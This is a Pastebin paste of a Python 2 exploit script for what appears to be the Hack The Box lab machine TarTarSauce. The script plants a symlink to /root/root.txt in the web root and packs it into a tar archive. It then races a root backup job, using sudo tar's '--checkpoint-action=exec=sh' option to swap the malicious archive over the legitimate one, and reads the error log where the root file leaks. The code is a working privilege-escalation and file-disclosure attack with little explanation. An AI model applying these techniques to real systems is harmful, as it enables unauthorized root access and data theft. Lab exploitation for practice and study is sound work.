API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 21st, 2018
3,012
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.15 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. #HtB.eu TarTar Sauce to root.txt python exploit
  3.  
  4. from os import system
  5.  
  6. import datetime
  7.  
  8. import os
  9.  
  10. import subprocess
  11.  
  12. import time
  13.  
  14. count = 0
  15.  
  16. global process_name
  17.  
  18. process_name = "backuperer"
  19.  
  20. global tarunnin
  21.  
  22. tarunnin = "tar"
  23.  
  24. global sleepyet
  25.  
  26. sleepyet = "sleep"
  27.  
  28. global wtdiff
  29.  
  30. wtdiff = "diff"
  31.  
  32. global maltar
  33.  
  34. maltar = "maltar.tar"
  35.  
  36. #def cleanup():
  37.  
  38. # tmp = os.popen("rm maltar.tar shell.sh")
  39.  
  40. # print "clean slate bitches"
  41.  
  42. # return
  43.  
  44.  
  45.  
  46. def create_simlink():
  47.  
  48. simlinktest = os.popen("ln -s /root/root.txt /var/www/html/boobies.txt").read()
  49.  
  50. simthere = os.popen("ls -a /var/www/html/ | grep -E 'boobies.txt'").read()
  51.  
  52. print ("we made " + str(simthere) + " at: " + str(datetime.datetime.now()))
  53.  
  54. print ""
  55.  
  56. return
  57.  
  58.  
  59.  
  60. def create_mal_tar():
  61.  
  62. tmp = os.popen("tar zvcPf " + maltar + " /var/www/html/").read()
  63.  
  64. tmpchk = os.popen("ls -a " + str(maltar)).read()
  65.  
  66. print ("file: " + str(tmpchk) + " created at: " + str(datetime.datetime.now()))
  67.  
  68. print ""
  69.  
  70. return
  71.  
  72.  
  73.  
  74. def rm_simlink():
  75.  
  76. tmp = os.popen("rm /var/www/html/boobies.txt").read()
  77.  
  78. tmpchk = os.popen("ls /var/www/html/ |grep boob*").read()
  79.  
  80. print ("is there boobie.txt? " + str(tmpchk))
  81.  
  82. print ""
  83.  
  84. return
  85.  
  86.  
  87.  
  88. def check_process(prcssname):
  89.  
  90. print ("looking for " + prcssname + " at: " + str(datetime.datetime.now()))
  91.  
  92. while True:
  93.  
  94. tmp = os.popen("ps -e").read()
  95.  
  96. if prcssname not in tmp[:]:
  97.  
  98. continue
  99.  
  100. else:
  101.  
  102. dttime = datetime.datetime.now()
  103.  
  104. print (prcssname + " ran at: " + str(dttime))
  105.  
  106. print ""
  107.  
  108. break
  109.  
  110. return
  111.  
  112.  
  113.  
  114. def check_for_tmpfile():
  115.  
  116. print "lets find that tmpfile name"
  117.  
  118. while True:
  119.  
  120. global tmpfile
  121.  
  122. tmpfile = os.popen("ls -a /var/tmp |grep -E '[.]\w{10,}'").read()
  123.  
  124. if tmpfile == "":
  125.  
  126. continue #keep tryin
  127.  
  128. else:
  129.  
  130. dttime = datetime.datetime.now()
  131.  
  132. print (tmpfile + " is the tmpfile name")
  133.  
  134. print ("found at: " + str(dttime))
  135.  
  136. print ""
  137.  
  138. break
  139.  
  140. return
  141.  
  142.  
  143.  
  144. def tmpfile_check():
  145.  
  146. print ("tmpfile variable really global? " + str(tmpfile))
  147.  
  148. print ""
  149.  
  150. return
  151.  
  152.  
  153.  
  154. def makin_copies(newtar):
  155.  
  156. dttime = datetime.datetime.now()
  157.  
  158. tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()
  159.  
  160. print ""
  161.  
  162. print ("hash for legit tar: " + str(tmphash))
  163.  
  164. print ""
  165.  
  166. tmp = "#!/bin/bash"
  167.  
  168. print ("makin copies of " + str(newtar) + " at: " + str(dttime))
  169.  
  170. tmpsh = os.popen("echo '" + str(tmp) + "' >> shell.sh").read()
  171.  
  172. tmpsh = os.popen("echo 'cp " + maltar + " /var/tmp/" + tmpfile + "' >> shell.sh").read()
  173.  
  174. tmpsh = os.popen("chmod +x ./shell.sh").read()
  175.  
  176. tmpsh = os.popen("sudo -u onuma tar cf /tmp/archive.tar --checkpoint = 1 --checkpoint-action=exec=sh shell.sh").read()
  177.  
  178. tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()
  179.  
  180. print ("new tar hash: " + str(tmphash))
  181.  
  182. print ""
  183.  
  184. return
  185.  
  186.  
  187.  
  188. def sleep_a_sec():
  189.  
  190. dttime = datetime.datetime.now()
  191.  
  192. print ("waiting 15 sec start now: " + str(dttime))
  193.  
  194. time.sleep(15)
  195.  
  196. dttime = datetime.datetime.now()
  197.  
  198. print ("has it been 5 seconds?" + str(dttime))
  199.  
  200. print ""
  201.  
  202. return
  203.  
  204.  
  205.  
  206. def cat_log():
  207.  
  208. #tmp = os.popen("cat /var/backups/onuma_backup_error.txt |grep boobies.txt").read()
  209.  
  210. tmp = os.popen("tail -n 50 /var/backups/onuma_backup_error.txt | grep \>").read()
  211.  
  212. print "hash should be near /"
  213.  
  214. print ""
  215.  
  216. print str(tmp)
  217.  
  218. exit
  219.  
  220.  
  221.  
  222. #cleanup()
  223.  
  224. startshitright = os.popen("rmdir /var/tmp/.b && mkdir /var/tmp/.b && cd /var/tmp/.b").read()
  225.  
  226. print "started right"
  227.  
  228. create_simlink()
  229.  
  230.  
  231.  
  232. create_mal_tar()
  233.  
  234.  
  235.  
  236. rm_simlink()
  237.  
  238.  
  239.  
  240. check_process(process_name)
  241.  
  242.  
  243.  
  244. check_process(tarunnin)
  245.  
  246.  
  247.  
  248. check_process(sleepyet)
  249.  
  250.  
  251.  
  252. sleep_a_sec()
  253.  
  254.  
  255.  
  256. check_for_tmpfile()
  257.  
  258.  
  259.  
  260. #makin_copies(tmpfile)
  261.  
  262. check_process(wtdiff)
  263.  
  264.  
  265.  
  266. #time.sleep(25)
  267.  
  268. makin_copies(tmpfile)
  269.  
  270. cat_log()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!